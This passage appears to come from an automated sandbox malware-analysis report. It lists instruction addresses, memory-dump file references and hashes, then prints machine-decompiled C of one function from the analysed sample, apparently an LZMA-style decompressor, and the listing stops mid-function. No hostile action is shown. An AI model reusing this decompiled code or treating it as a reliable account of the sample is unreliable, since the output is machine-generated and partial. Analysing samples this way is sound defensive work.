                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x00000000
                                                                        0x00407569
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e29
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e60
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e93
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e9c
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eb1
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406ef9
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f24
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f29
                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f75
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00406f9a
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00000000
                                                                        0x00406f41
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fbd
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fe8
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406fed
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073bb
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x00000000
                                                                        0x004073c8
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00000000
                                                                        0x0040753b
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                        • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                        • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                        • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00406BB0(void* __ecx) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				signed int _v16;
                                                                        				unsigned int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v95;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				intOrPtr _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				void _v140;
                                                                        				void* _v148;
                                                                        				signed int _t537;
                                                                        				signed int _t538;
                                                                        				signed int _t572;
                                                                        
                                                                        				_t572 = 0x22;
                                                                        				_v148 = __ecx;
                                                                        				memcpy( &_v140, __ecx, _t572 << 2);
                                                                        				if(_v52 == 0xffffffff) {
                                                                        					return 1;
                                                                        				}
                                                                        				while(1) {
                                                                        					L3:
                                                                        					_t537 = _v140;
                                                                        					if(_t537 > 0x1c) {
                                                                        						break;
                                                                        					}
                                                                        					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                        						case 0:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								goto L173;
                                                                        							}
                                                                        							_v112 = _v112 - 1;
                                                                        							_v116 = _v116 + 1;
                                                                        							_t537 =  *_v116;
                                                                        							__eflags = _t537 - 0xe1;
                                                                        							if(_t537 > 0xe1) {
                                                                        								goto L174;
                                                                        							}
                                                                        							_t542 = _t537 & 0x000000ff;
                                                                        							_push(0x2d);
                                                                        							asm("cdq");
                                                                        							_pop(_t576);
                                                                        							_push(9);
                                                                        							_pop(_t577);
                                                                        							_t622 = _t542 / _t576;
                                                                        							_t544 = _t542 % _t576 & 0x000000ff;
                                                                        							asm("cdq");
                                                                        							_t617 = _t544 % _t577 & 0x000000ff;
                                                                        							_v64 = _t617;
                                                                        							_v32 = (1 << _t622) - 1;
                                                                        							_v28 = (1 << _t544 / _t577) - 1;
                                                                        							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                        							__eflags = 0x600 - _v124;
                                                                        							if(0x600 == _v124) {
                                                                        								L12:
                                                                        								__eflags = _t625;
                                                                        								if(_t625 == 0) {
                                                                        									L14:
                                                                        									_v76 = _v76 & 0x00000000;
                                                                        									_v68 = _v68 & 0x00000000;
                                                                        									goto L17;
                                                                        								} else {
                                                                        									goto L13;
                                                                        								}
                                                                        								do {
                                                                        									L13:
                                                                        									_t625 = _t625 - 1;
                                                                        									__eflags = _t625;
                                                                        									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                        								} while (_t625 != 0);
                                                                        								goto L14;
                                                                        							}
                                                                        							__eflags = _v8;
                                                                        							if(_v8 != 0) {
                                                                        								GlobalFree(_v8);
                                                                        							}
                                                                        							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                        							__eflags = _t537;
                                                                        							_v8 = _t537;
                                                                        							if(_t537 == 0) {
                                                                        								goto L174;
                                                                        							} else {
                                                                        								_v124 = 0x600;
                                                                        								goto L12;
                                                                        							}
                                                                        						case 1:
                                                                        							L15:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 1;
                                                                        								goto L173;
                                                                        							}
                                                                        							_v112 = _v112 - 1;
                                                                        							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                        							_v116 = _v116 + 1;
                                                                        							_t50 =  &_v76;
                                                                        							 *_t50 = _v76 + 1;
                                                                        							__eflags =  *_t50;
                                                                        							L17:
                                                                        							__eflags = _v76 - 4;
                                                                        							if(_v76 < 4) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t550 = _v68;
                                                                        							__eflags = _t550 - _v120;
                                                                        							if(_t550 == _v120) {
                                                                        								L22:
                                                                        								_v76 = 5;
                                                                        								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                        								goto L25;
                                                                        							}
                                                                        							__eflags = _v12;
                                                                        							_v120 = _t550;
                                                                        							if(_v12 != 0) {
                                                                        								GlobalFree(_v12);
                                                                        							}
                                                                        							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                        							__eflags = _t537;
                                                                        							_v12 = _t537;
                                                                        							if(_t537 == 0) {
                                                                        								goto L174;
                                                                        							} else {
                                                                        								goto L22;
                                                                        							}
                                                                        						case 2:
                                                                        							L26:
                                                                        							_t557 = _v100 & _v32;
                                                                        							_v136 = 6;
                                                                        							_v80 = _t557;
                                                                        							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                        							goto L135;
                                                                        						case 3:
                                                                        							L23:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 3;
                                                                        								goto L173;
                                                                        							}
                                                                        							_v112 = _v112 - 1;
                                                                        							_t72 =  &_v116;
                                                                        							 *_t72 = _v116 + 1;
                                                                        							__eflags =  *_t72;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							L25:
                                                                        							_v76 = _v76 - 1;
                                                                        							__eflags = _v76;
                                                                        							if(_v76 != 0) {
                                                                        								goto L23;
                                                                        							}
                                                                        							goto L26;
                                                                        						case 4:
                                                                        							L136:
                                                                        							_t559 =  *_t626;
                                                                        							_t610 = _t559 & 0x0000ffff;
                                                                        							_t591 = (_v20 >> 0xb) * _t610;
                                                                        							__eflags = _v16 - _t591;
                                                                        							if(_v16 >= _t591) {
                                                                        								_v20 = _v20 - _t591;
                                                                        								_v16 = _v16 - _t591;
                                                                        								_v68 = 1;
                                                                        								_t560 = _t559 - (_t559 >> 5);
                                                                        								__eflags = _t560;
                                                                        								 *_t626 = _t560;
                                                                        							} else {
                                                                        								_v20 = _t591;
                                                                        								_v68 = _v68 & 0x00000000;
                                                                        								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                        							}
                                                                        							__eflags = _v20 - 0x1000000;
                                                                        							if(_v20 >= 0x1000000) {
                                                                        								goto L142;
                                                                        							} else {
                                                                        								goto L140;
                                                                        							}
                                                                        						case 5:
                                                                        							L140:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 5;
                                                                        								goto L173;
                                                                        							}
                                                                        							_v20 = _v20 << 8;
                                                                        							_v112 = _v112 - 1;
                                                                        							_t464 =  &_v116;
                                                                        							 *_t464 = _v116 + 1;
                                                                        							__eflags =  *_t464;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							L142:
                                                                        							_t561 = _v136;
                                                                        							goto L143;
                                                                        						case 6:
                                                                        							__edx = 0;
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								__eax = _v8;
                                                                        								__ecx = _v60;
                                                                        								_v56 = 1;
                                                                        								_v136 = 7;
                                                                        								__esi = _v8 + 0x180 + _v60 * 2;
                                                                        								goto L135;
                                                                        							}
                                                                        							__eax = _v96 & 0x000000ff;
                                                                        							__esi = _v100;
                                                                        							__cl = 8;
                                                                        							__cl = 8 - _v64;
                                                                        							__esi = _v100 & _v28;
                                                                        							__eax = (_v96 & 0x000000ff) >> 8;
                                                                        							__ecx = _v64;
                                                                        							__esi = (_v100 & _v28) << 8;
                                                                        							__ecx = _v8;
                                                                        							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                        							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                        							__eflags = _v60 - 4;
                                                                        							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                        							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                        							if(_v60 >= 4) {
                                                                        								__eflags = _v60 - 0xa;
                                                                        								if(_v60 >= 0xa) {
                                                                        									_t103 =  &_v60;
                                                                        									 *_t103 = _v60 - 6;
                                                                        									__eflags =  *_t103;
                                                                        								} else {
                                                                        									_v60 = _v60 - 3;
                                                                        								}
                                                                        							} else {
                                                                        								_v60 = 0;
                                                                        							}
                                                                        							__eflags = _v56 - __edx;
                                                                        							if(_v56 == __edx) {
                                                                        								__ebx = 0;
                                                                        								__ebx = 1;
                                                                        								goto L63;
                                                                        							}
                                                                        							__eax = _v24;
                                                                        							__eax = _v24 - _v48;
                                                                        							__eflags = __eax - _v120;
                                                                        							if(__eax >= _v120) {
                                                                        								__eax = __eax + _v120;
                                                                        								__eflags = __eax;
                                                                        							}
                                                                        							__ecx = _v12;
                                                                        							__ebx = 0;
                                                                        							__ebx = 1;
                                                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                        							goto L43;
                                                                        						case 7:
                                                                        							__eflags = _v68 - 1;
                                                                        							if(_v68 != 1) {
                                                                        								__eax = _v40;
                                                                        								_v132 = 0x16;
                                                                        								_v36 = _v40;
                                                                        								__eax = _v44;
                                                                        								_v40 = _v44;
                                                                        								__eax = _v48;
                                                                        								_v44 = _v48;
                                                                        								__eax = 0;
                                                                        								__eflags = _v60 - 7;
                                                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        								__al = __al & 0x000000fd;
                                                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                        								__eax = _v8;
                                                                        								__eax = _v8 + 0x664;
                                                                        								__eflags = __eax;
                                                                        								_v92 = __eax;
                                                                        								goto L71;
                                                                        							}
                                                                        							__eax = _v8;
                                                                        							__ecx = _v60;
                                                                        							_v136 = 8;
                                                                        							__esi = _v8 + 0x198 + _v60 * 2;
                                                                        							goto L135;
                                                                        						case 8:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								__eax = _v8;
                                                                        								__ecx = _v60;
                                                                        								_v136 = 0xa;
                                                                        								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                        							} else {
                                                                        								__eax = _v60;
                                                                        								__ecx = _v8;
                                                                        								__eax = _v60 + 0xf;
                                                                        								_v136 = 9;
                                                                        								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                        								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                        							}
                                                                        							goto L135;
                                                                        						case 9:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								goto L92;
                                                                        							}
                                                                        							__eflags = _v100;
                                                                        							if(_v100 == 0) {
                                                                        								goto L174;
                                                                        							}
                                                                        							__eax = 0;
                                                                        							__eflags = _v60 - 7;
                                                                        							_t264 = _v60 - 7 >= 0;
                                                                        							__eflags = _t264;
                                                                        							0 | _t264 = _t264 + _t264 + 9;
                                                                        							_v60 = _t264 + _t264 + 9;
                                                                        							goto L78;
                                                                        						case 0xa:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								__eax = _v8;
                                                                        								__ecx = _v60;
                                                                        								_v136 = 0xb;
                                                                        								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                        								goto L135;
                                                                        							}
                                                                        							__eax = _v44;
                                                                        							goto L91;
                                                                        						case 0xb:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								__ecx = _v40;
                                                                        								__eax = _v36;
                                                                        								_v36 = _v40;
                                                                        							} else {
                                                                        								__eax = _v40;
                                                                        							}
                                                                        							__ecx = _v44;
                                                                        							_v40 = _v44;
                                                                        							L91:
                                                                        							__ecx = _v48;
                                                                        							_v48 = __eax;
                                                                        							_v44 = _v48;
                                                                        							L92:
                                                                        							__eax = _v8;
                                                                        							_v132 = 0x15;
                                                                        							__eax = _v8 + 0xa68;
                                                                        							_v92 = _v8 + 0xa68;
                                                                        							goto L71;
                                                                        						case 0xc:
                                                                        							L102:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0xc;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t340 =  &_v116;
                                                                        							 *_t340 = _v116 + 1;
                                                                        							__eflags =  *_t340;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							__eax = _v48;
                                                                        							goto L104;
                                                                        						case 0xd:
                                                                        							L39:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0xd;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t127 =  &_v116;
                                                                        							 *_t127 = _v116 + 1;
                                                                        							__eflags =  *_t127;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							L41:
                                                                        							__eax = _v68;
                                                                        							__eflags = _v76 - _v68;
                                                                        							if(_v76 != _v68) {
                                                                        								goto L50;
                                                                        							}
                                                                        							__eflags = __ebx - 0x100;
                                                                        							if(__ebx >= 0x100) {
                                                                        								goto L56;
                                                                        							}
                                                                        							L43:
                                                                        							__eax = _v95 & 0x000000ff;
                                                                        							_v95 = _v95 << 1;
                                                                        							__ecx = _v92;
                                                                        							__eax = (_v95 & 0x000000ff) >> 7;
                                                                        							_v76 = __eax;
                                                                        							__eax = __eax + 1;
                                                                        							__eax = __eax << 8;
                                                                        							__eax = __eax + __ebx;
                                                                        							__esi = _v92 + __eax * 2;
                                                                        							_v20 = _v20 >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							_v88 = __esi;
